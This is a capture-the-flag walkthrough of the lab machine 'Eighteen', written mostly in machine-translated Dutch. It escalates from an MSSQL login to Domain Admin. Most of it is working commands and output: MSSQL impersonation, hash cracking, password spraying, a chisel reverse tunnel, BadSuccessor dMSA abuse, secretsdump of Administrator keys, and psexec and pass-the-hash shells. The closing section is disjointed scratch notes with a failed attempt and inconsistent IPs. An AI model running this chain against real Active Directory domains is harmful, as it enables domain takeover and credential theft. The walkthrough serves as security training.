Machine Info
- Name: Eighteen
- Difficulty: Easy (Windows Active Directory)
- IP: 10.129.70.135 (referred to as $target in commands)
- OS: Windows Server (Domain Controller — DC01.eighteen.htb)
- Key Techniques: MSSQL Enumeration & Impersonation → PBKDF2 Hash Cracking → Domain User Enumeration → WinRM Foothold → AD ACL Abuse (CreateChild on Staff OU) → dMSA Abuse (BadSuccessor / SharpSuccessor) → Impersonate Administrator
Attack Chain Summary (One-liner from your notes): “The user adam.scott, member of the IT group, had CreateChild permissions over the Staff OU, allowing the creation of a malicious dMSA object, which was abused to impersonate the Domain Administrator.”
scannen
Voer eerst een poortscan uit.
Het volgende voorbeeld voert een poortscan uit met behulp van een vooraf voorbereid shellscript.
##################
# Port scan tool #
##################
*Detailed scan :1
*Full scan :2
***Select scanning method by number***
1
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 22:21 JST
Nmap scan report for 10.129.7.197
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ssl-date: 2026-01-22T20:21:44+00:00; +7h00m01s from scanner time.
| ms-sql-ntlm-info:
| 10.129.7.197:1433:
| Target_Name: EIGHTEEN
| NetBIOS_Domain_Name: EIGHTEEN
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: eighteen.htb
| DNS_Computer_Name: DC01.eighteen.htb
| DNS_Tree_Name: eighteen.htb
|_ Product_Version: 10.0.26100
| ms-sql-info:
| 10.129.7.197:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-22T20:15:14
|_Not valid after: 2056-01-22T20:15:14
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.80 seconds
Scan completed
We zullen een onderzoek instellen op basis van de resultaten van de bovengenoemde havenscan.
opsommen
De resultaten van de poortscan bevestigen dat Microsoft SQL Server draait op poort 1433.
Om Microsoft SQL Server te inventariseren, gebruikt u impacket.
impacket
Gebruik impacket-mssqlclient om toegang te krijgen tot Microsoft SQL Server.
$ impacket-mssqlclient kevin:'iNa2we6haRj2gaw!'@10.129.7.197
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (kevin guest@master)>
Hiermee worden alle gebruikers met een account in SQL Server opgesomd.
SQL (kevin guest@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
------ --------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 0 1 0 0 0 0 0 0 0
kevin SQL_LOGIN 0 0 0 0 0 0 0 0 0
appdev SQL_LOGIN 0 0 0 0 0 0 0 0 0
Het lijkt erop dat Kevin de bevoegdheid heeft om zich voor te doen als appdev.
SQL (kevin guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
b'LOGIN' b'' IMPERSONATE GRANT kevin appdev
enum_impersonateOp basis van de resultaten loggen we in door de appdev-gebruiker te imiteren.
SQL (kevin guest@master)> exec_as_login appdev
SQL (appdev appdev@master)>
Hiermee worden de databases opgesomd.
SQL (appdev appdev@master)> enum_db
name is_trustworthy_on
----------------- -----------------
master 0
tempdb 0
model 0
msdb 1
financial_planner 0
Maak verbinding met de database van de financieel planner.
SQL (appdev appdev@master)> USE financial_planner;
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev appdev@financial_planner)>
Controleer de tabellen in de database financial_planner.
SQL (appdev appdev@financial_planner)> SELECT name FROM financial_planner.sys.tables;
name
-----------
users
incomes
expenses
allocations
analytics
visits
Bij het bekijken van de kolomgegevens in de gebruikerstabel kunnen we zien dat deze wachtwoordhashes bevat.
SQL (appdev appdev@financial_planner)> SELECT column_name, data_type FROM information_schema.columns WHERE table_name='users';
column_name data_type
------------- ---------
id int
full_name nvarchar
username nvarchar
email nvarchar
password_hash nvarchar
is_admin bit
created_at datetime
Door gegevens uit de gebruikerstabel op te halen, kon ik de wachtwoordhash van de beheerder bevestigen.
SQL (appdev appdev@financial_planner)> SELECT * FROM users;
id full_name username email password_hash is_admin created_at
---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------
1002 admin admin admin@eighteen.htb pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133 1 2025-10-29 05:39:03
Hashwaarde-analyse
Controle met hashcat laat zien dat het wachtwoord de hash-indeling van Django (PBKDF2-SHA256) lijkt te hebben.
$ hashcat -m 10000 --example-hashes
hashcat (v7.1.2) starting in hash-info mode
Hash Info:
==========
Hash mode #10000
Name................: Django (PBKDF2-SHA256)
Category............: Framework
Slow.Hash...........: Yes
Deprecated..........: No
Deprecated.Notice...: N/A
Password.Type.......: plain
Password.Len.Min....: 0
Password.Len.Max....: 256
Salt.Type...........: Embedded
Salt.Len.Min........: 0
Salt.Len.Max........: 256
Kernel.Type(s)......: pure
Example.Hash.Format.: plain
Example.Hash........: pbkdf2_sha256$10000$1135411628$bFYX62rfJobJ07VwrUMXfuffLfj2RDM2G6/BrTrUWkE=
Example.Pass........: hashcat
Benchmark.Mask......: ?a?a?a?a?a?a?a
Autodetect.Enabled..: Yes
Self.Test.Enabled...: Yes
Potfile.Enabled.....: Yes
Keep.Guessing.......: No
Custom.Plugin.......: No
Plaintext.Encoding..: ASCII, HEX
Het PBKDF2-HMAC-SHA256-hashformaat $is afgebakend en bestaat van links naar rechts uit het gebruikte algoritme, het aantal reeksen, de salt en de base64-gecodeerde hashwaarde.
Om de hashwaarde te analyseren, voeren we daarom base64-codering uit.
$ echo '0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133' | xxd -r -p | base64 -w0
BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=
Om hashcat uit te voeren, maak je een bestand aan met de hierboven beschreven gecodeerde hashwaarde.
pbkdf2_sha256$600000$AMtzteQIG7yAbZIa$BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=
Met hashcat kun je het wachtwoord controleren.
$ hashcat -a 0 -m 10000 hash.txt /usr/share/wordlists/rockyou.txt
pbkdf2_sha256$600000$AMtzteQIG7yAbZIa$BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=:REDACTED
nxc
We gaan gebruikers opsommen met behulp van nxc.
$ nxc mssql 10.129.7.197 -u kevin -p 'iNa2we6haRj2gaw!' --rid-brute --local-auth
MSSQL 10.129.7.197 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.129.7.197 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL 10.129.7.197 1433 DC01 498: EIGHTEEN\Enterprise Read-only Domain Controllers
MSSQL 10.129.7.197 1433 DC01 500: EIGHTEEN\Administrator
MSSQL 10.129.7.197 1433 DC01 501: EIGHTEEN\Guest
MSSQL 10.129.7.197 1433 DC01 502: EIGHTEEN\krbtgt
MSSQL 10.129.7.197 1433 DC01 512: EIGHTEEN\Domain Admins
MSSQL 10.129.7.197 1433 DC01 513: EIGHTEEN\Domain Users
MSSQL 10.129.7.197 1433 DC01 514: EIGHTEEN\Domain Guests
MSSQL 10.129.7.197 1433 DC01 515: EIGHTEEN\Domain Computers
MSSQL 10.129.7.197 1433 DC01 516: EIGHTEEN\Domain Controllers
MSSQL 10.129.7.197 1433 DC01 517: EIGHTEEN\Cert Publishers
MSSQL 10.129.7.197 1433 DC01 518: EIGHTEEN\Schema Admins
MSSQL 10.129.7.197 1433 DC01 519: EIGHTEEN\Enterprise Admins
MSSQL 10.129.7.197 1433 DC01 520: EIGHTEEN\Group Policy Creator Owners
MSSQL 10.129.7.197 1433 DC01 521: EIGHTEEN\Read-only Domain Controllers
MSSQL 10.129.7.197 1433 DC01 522: EIGHTEEN\Cloneable Domain Controllers
MSSQL 10.129.7.197 1433 DC01 525: EIGHTEEN\Protected Users
MSSQL 10.129.7.197 1433 DC01 526: EIGHTEEN\Key Admins
MSSQL 10.129.7.197 1433 DC01 527: EIGHTEEN\Enterprise Key Admins
MSSQL 10.129.7.197 1433 DC01 528: EIGHTEEN\Forest Trust Accounts
MSSQL 10.129.7.197 1433 DC01 529: EIGHTEEN\External Trust Accounts
MSSQL 10.129.7.197 1433 DC01 553: EIGHTEEN\RAS and IAS Servers
MSSQL 10.129.7.197 1433 DC01 571: EIGHTEEN\Allowed RODC Password Replication Group
MSSQL 10.129.7.197 1433 DC01 572: EIGHTEEN\Denied RODC Password Replication Group
MSSQL 10.129.7.197 1433 DC01 1000: EIGHTEEN\DC01$
MSSQL 10.129.7.197 1433 DC01 1101: EIGHTEEN\DnsAdmins
MSSQL 10.129.7.197 1433 DC01 1102: EIGHTEEN\DnsUpdateProxy
MSSQL 10.129.7.197 1433 DC01 1601: EIGHTEEN\mssqlsvc
MSSQL 10.129.7.197 1433 DC01 1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
MSSQL 10.129.7.197 1433 DC01 1603: EIGHTEEN\HR
MSSQL 10.129.7.197 1433 DC01 1604: EIGHTEEN\IT
MSSQL 10.129.7.197 1433 DC01 1605: EIGHTEEN\Finance
MSSQL 10.129.7.197 1433 DC01 1606: EIGHTEEN\jamie.dunn
MSSQL 10.129.7.197 1433 DC01 1607: EIGHTEEN\jane.smith
MSSQL 10.129.7.197 1433 DC01 1608: EIGHTEEN\alice.jones
MSSQL 10.129.7.197 1433 DC01 1609: EIGHTEEN\adam.scott
MSSQL 10.129.7.197 1433 DC01 1610: EIGHTEEN\bob.brown
MSSQL 10.129.7.197 1433 DC01 1611: EIGHTEEN\carol.white
MSSQL 10.129.7.197 1433 DC01 1612: EIGHTEEN\dave.green
Op basis van de resultaten van bovenstaande nxc zullen we een lijst met gebruikersinformatie maken.
- gebruiker.txt
jamie.dunn
jane.smith
alice.jones
adam.scott
bob.brown
carol.white
dave.green
Als je nxc opnieuw uitvoert met de lijst met gebruikersgegevens die je hebt aangemaakt, kun je controleren of de gebruiker adam.scott geldig is.
$ nxc winrm 10.129.5.209 -u user.txt -p REDACTED
WINRM 10.129.7.197 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM 10.129.7.197 5985 DC01 [-] eighteen.htb\jamie.dunn:REDACTED
WINRM 10.129.7.197 5985 DC01 [-] eighteen.htb\jane.smith:REDACTED
WINRM 10.129.7.197 5985 DC01 [-] eighteen.htb\alice.jones:REDACTED
WINRM 10.129.7.197 5985 DC01 [+] eighteen.htb\adam.scott:REDACTED (Pwn3d!)
Systeemhacking
We zullen de hierboven verkregen authenticatiegegevens gebruiken om het raamwerk te bouwen.
Toenemend verkeer
Voer evil-winrm uit.
$ evil-winrm -i 10.129.7.197 -u adam.scott -p 'REDACTED'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.scott\Documents>
Gebruikersvlag
Je kunt de gebruikersvlag controleren vanaf het bureaublad.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> dir
Directory: C:\Users\adam.scott\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/22/2026 12:13 PM 34 user.txt
Hoofdvlag
Om de root-vlag te verkrijgen, moet je je privileges verhogen.
Uit de registergegevens blijkt dat het besturingssysteem Windows Server 2025 Datacenter is.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName REG_SZ Windows Server 2025 Datacenter
Tijdens mijn onderzoek naar kwetsbaarheden in Windows Server 2025 Datacenter stuitte ik op een BadSuccessor-kwetsbaarheid.
BadSuccessor is een beveiligingslek in Active Directory dat leidt tot privilege-escalatie. Dit lek is ontstaan door de functie Delegated Management Service Account (dMSA) in Windows Server 2025.
PowerView.ps1Ik zal dit uploaden voor verder onderzoek .
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> upload /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
Info: Uploading /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 to C:\Users\adam.scott\Desktop\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
Voer de volgende opdracht uit om PowerView.ps1het te importeren.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> Import-Module .\PowerView.ps1
Find-InterestingDomainAclHieruit kunnen we opmaken dat de IT-groep de machtiging CreateChild heeft voor de Staff OU.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> Find-InterestingDomainAcl
ObjectDN : OU=Staff,DC=eighteen,DC=htb
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-1152179935-589108180-1989892463-1604
IdentityReferenceName : IT
IdentityReferenceDomain : eighteen.htb
IdentityReferenceDN : CN=IT,OU=Staff,DC=eighteen,DC=htb
IdentityReferenceClass : group
Bovendien kan worden bevestigd dat adam.scott tot de IT-groep behoort.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
EIGHTEEN\IT Group S-1-5-21-1152179935-589108180-1989892463-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Ik heb het BadSuccessor-script op GitHub gevonden,
https://github.com/b5null/Invoke-BadSuccessor.ps1
dus om de upload uit te voeren, start ik impacket-smbserver om SMB te starten.
$ impacket-smbserver share . -smb2support
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
Voer het volgende commando uit om het te mounten.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> net use Z: \\10.10.14.108\share
The command completed successfully.
Voer de volgende opdracht uit om het script te kopiëren.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> copy Z:\\Invoke-BadSuccessor.ps1 ./
Aangezien toegang tot Active Directory via Chisel verloopt, zal de aanvaller een Chisel-server draaien.
$ ./chisel_1.11.3_linux_amd64 server -p 8888 --reverse
2026/01/22 22:57:47 server: Reverse tunnelling enabled
2026/01/22 22:57:47 server: Fingerprint mnznVI7Cc7R0wSKbJOF0+zOfI89YvMNmZrCTCFVJrrA=
2026/01/22 22:57:47 server: Listening on http://0.0.0.0:8888
Om de Evil-WinRM shell te starten, kopieer je chisel.exe.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> copy Z:\\chisel.exe .\
Start chisel.exe.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> .\chisel.exe client 10.10.14.108:8888 R:socks
chisel.exe : 2026/01/22 13:01:01 client: Connecting to ws://10.10.14.108:8888
+ CategoryInfo : NotSpecified: (2026/01/22 13:0....10.14.108:8888:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
2026/01/22 13:01:04 client: Connected (Latency 250.6274ms)
Voer de volgende opdracht uit om de module te importeren.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> Import-Module .\Invoke-BadSuccessor.ps1
Voer het script Invoke-BadSuccessor uit.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> Invoke-BadSuccessor
[+] Created computer 'Pwn' in 'OU=Staff,DC=eighteen,DC=htb'.
[+] Machine Account's sAMAccountName : Pwn$
[+] Machine Account's SID : S-1-5-21-1152179935-589108180-1989892463-12601
[+] Created delegated service account 'attacker_dMSA' in 'OU=Staff,DC=eighteen,DC=htb'.
[+] Service Account's sAMAccountName : attacker_dMSA$
[+] Service Account's SID : S-1-5-21-1152179935-589108180-1989892463-12602
[+] Allowed to retrieve password : Pwn$
[+] Added ACE on 'CN=attacker_dMSA,OU=Staff,DC=eighteen,DC=htb' for 'adam.scott' (S-1-5-21-1152179935-589108180-1989892463-1609) with rights 'All' (Allow, ThisObjectOnly).
[+] Granted 'GenericAll' on 'attacker_dMSA$' to 'adam.scott'.
[+] Configured delegated MSA state for 'attacker_dMSA$' with predecessor:
CN=Administrator,CN=Users,DC=eighteen,DC=htb
[+] Next steps (Rubeus):
Rubeus.exe hash /password:'Password123!' /user:Pwn$ /domain:eighteen.htb
Rubeus.exe asktgt /user:Pwn$ /aes256:<AES256KEY> /domain:eighteen.htb
Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/eighteen.htb /dmsa /opsec /ptt /nowrap /outfile:ticket.kirbi /ticket:<BASE64TGT>
[+] Alternative (Impacket):
getST.py 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'
De aanvallende partij zal haar eigen synchronisatie onderbreken.
$ sudo systemctl stop systemd-timesyncd
Controleer de tijd aan de doelzijde.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> [DateTime]::UtcNow.ToString("yyyy-MM-dd HH:mm:ss")
De softwareklok wordt aangepast aan de klok van de machine.
% sudo date -u -s '2026-01-21 21:40:36'
Ik ga mijn TGS-ticket halen.
$ proxychains impacket-getST 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[*] Impersonating attacker_dMSA$
[*] Requesting S4U2self
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.129.7.197:88 ... OK
[*] Current keys:
[*] EncryptionTypes.aes256_cts_hmac_sha1_96:82213b9d49ff5d8a7410f5298b9641d10b12d1b0140a2f02e916059ff9589055
[*] EncryptionTypes.rc4_hmac:159cd59d4d328fafa1ae07eb3b00181c
[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:0b133be956bfaddf9cea56701affddec
[*] Saving ticket in attacker_dMSA$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache
Geef de hashwaarde van de beheerder weer.
KRB5CCNAME=./'attacker_dMSA$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache'
proxychains4 impacket-secretsdump -k -no-pass DC01.eighteen.htb
-just-dc-user Administrator
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:49678 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
[*] Kerberos keys grabbed
Administrator:0x14:977d41fb9cb35c5a28280a6458db3348ed1a14d09248918d182a9d3866809d7b
Administrator:0x13:5ebe190ad8b5efaaae5928226046dfc0
Administrator:aes256-cts-hmac-sha1-96:1acd569d364cbf11302bfe05a42c4fa5a7794bab212d0cda92afb586193eaeb2
Administrator:aes128-cts-hmac-sha1-96:7b6b4158f2b9356c021c2b35d000d55f
Administrator:0x17:0b133be956bfaddf9cea56701affddec
[*] Cleaning up...
De verkregen hashwaarde wordt gebruikt om een verbinding tot stand te brengen met behulp van impacket-psexec.
$ proxychains4 impacket-psexec eighteen.htb/administrator@DC01.eighteen.htb -no-pass -k -aesKey
'1acd569d364cbf11302bfe05a42c4fa5a7794bab212d0cda92afb586193eaeb2'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[*] Requesting shares on DC01.eighteen.htb.....
[*] Found writable share ADMIN$
[*] Uploading file OQoYebeb.exe
[*] Opening SVCManager on DC01.eighteen.htb.....
[*] Creating service Mrps on DC01.eighteen.htb.....
[*] Starting service Mrps.....
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
Microsoft Windows [Version 10.0.26100.4349]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32>
De root-vlag kan worden gecontroleerd via het bureaublad van de beheerder.
evil-winrm-py -i dc01.eighteen.htb -u administrator -H 0b133be956bfaddf9cea56701affddec
Kortom,
De BadSuccessor-kwetsbaarheid heeft een nieuw debat op gang gebracht over hoe kwetsbaarheden openbaar gemaakt moeten worden, nadat het beveiligingsteam van Akamai informatie over de exploitatie van BadSuccessor had vrijgegeven.
referentie
- Overzicht van serviceaccounts voor gedelegeerd beheer
- BadSuccessor: Misbruik van dMSA om Active Directory-rechten te verhogen
- De oude BadSuccessor is dood, maar de nieuwe BadSuccessor leeft voort (?)
.
-- iets anders
*Evil-WinRM* PS C:\programdata> ./Badsuccessor.exe escalate -targetOU "OU=Staff,DC=eighteen,DC=htb" -dmsa evil_puck -targetUser "CN=ADMINISTRATOR,CN=USERS,DC=EIGHTEEN,DC=HTB" -dc-ip 10.129.36.212 -dnshostname evil_puck -user adam.scott
______ __ _______
| __ \ .---.-.--| | __|.--.--.----.----.-----.-----.-----.-----.----.
| __ < | _ | _ |__ || | | __| __| -__|__ --|__ --| _ | _|
|______/ |___._|_____|_______||_____|____|____|_____|_____|_____|_____|__|
Researcher: @YuG0rd
Author: @kreepsec
[*] Creating dMSA object...
[*] Inheriting target user privileges
-> msDS-ManagedAccountPrecededByLink = CN=ADMINISTRATOR,CN=USERS,DC=EIGHTEEN,DC=HTB
-> msDS-DelegatedMSAState = 2
[+] Privileges Obtained.
[*] Setting PrincipalsAllowedToRetrieveManagedPassword
-> msDS-GroupMSAMembership = adam.scott
[+] Setting userAccountControl attribute
[+] Setting msDS-SupportedEncryptionTypes attribute
[+] Created dMSA 'evil_puck' in 'OU=Staff,DC=eighteen,DC=htb', linked to 'CN=ADMINISTRATOR,CN=USERS,DC=EIGHTEEN,DC=HTB' (DC: 10.129.36.212)
[*] Phase 4: Use Rubeus or Kerbeus BOF to retrieve TGS and Password Hash
-> Step 1: Find luid of krbtgt ticket
Rubeus: .\Rubeus.exe triage
Kerbeus BOF: krb_triage BOF
-> Step 2: Get TGT of Windows 2025/24H2 system with a delegated MSA setup and migration finished.
Rubeus: .\Rubeus.exe dump /luid:<luid> /service:krbtgt /nowrap
Kerbeus BOF: krb_dump /luid:<luid>
-> Step 3: Use ticket to get a TGS ( Requires Rubeus PR: https://github.com/GhostPack/Rubeus/pull/194 )
Rubeus: .\Rubeus.exe asktgs /ticket:TICKET_FROM_ABOVE /targetuser:evil_puck$ /service:krbtgt/domain.local /dmsa /dc:<DC hostname> /opsec /nowrap
*Evil-WinRM* PS C:\programdata>
*Evil-WinRM* PS C:\programdata> .\Rubeus.exe triage
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
Action: Triage Kerberos Tickets (Current User)
[*] Current LUID : 0xc5bba
---------------------------------------
| LUID | UserName | Service | EndTime |
---------------------------------------
---------------------------------------
*Evil-WinRM* PS C:\programdata>
.
┌──(bolke㉿hacky)-[~/htb/eighteen] └─$ chisel server --reverse -p 8888 2026/04/30 21:32:03 server: Reverse tunnelling enabled 2026/04/30 21:32:03 server: Fingerprint gLwW21gt3i6uaXA5SofVujT9cCWNgkuAxpD5YUxEGS4= 2026/04/30 21:32:03 server: Listening on http://0.0.0.0:8888 2026/04/30 21:49:14 server: session#1: Client version (1.11.5) differs from server version (1.11.5-0kali1) 2026/04/30 21:49:14 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
.
*Evil-WinRM* PS C:\programdata> .\chisel.exe client 10.10.14.187:8888 R:socks
chisel.exe : 2026/04/30 12:49:56 client: Connecting to ws://10.10.14.187:8888
+ CategoryInfo : NotSpecified: (2026/04/30 12:4....10.14.187:8888:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
2026/04/30 12:49:56 client: Connected (Latency 9.8813ms)
.
┌──(bolke㉿hacky)-[~/htb/eighteen] └─$ proxychains impacket-getTGT eighteen.htb/'adam.scott:iloveyou1' -dc-ip 10.129.36.212 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.129.36.212:88 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.129.36.212:88 ... OK [*] Saving ticket in adam.scott.ccache
.
impacket-ticketConverter adam.scott.ccache adam.scott.kirbi
.
upload adam.scott.kirbi .
*Evil-WinRM* PS C:\programdata> ./Rubeus.exe ptt /ticket:adam.scott.kirbi ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.3.2 [*] Action: Import Ticket [X] Error 1312 running LsaLookupAuthenticationPackage (ProtocalStatus): A specified logon session does not exist. It may already have been terminated *Evil-WinRM* PS C:\programdata>
error : no clue
.
Once will be retire then uploaded full walkthrough
┌──(puck㉿kali)-[~/htb/eighteen]
└─$ evil-winrm -i eighteen.htb -u Administrator -H '0b133be956bfaddf9cea56701affddec'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
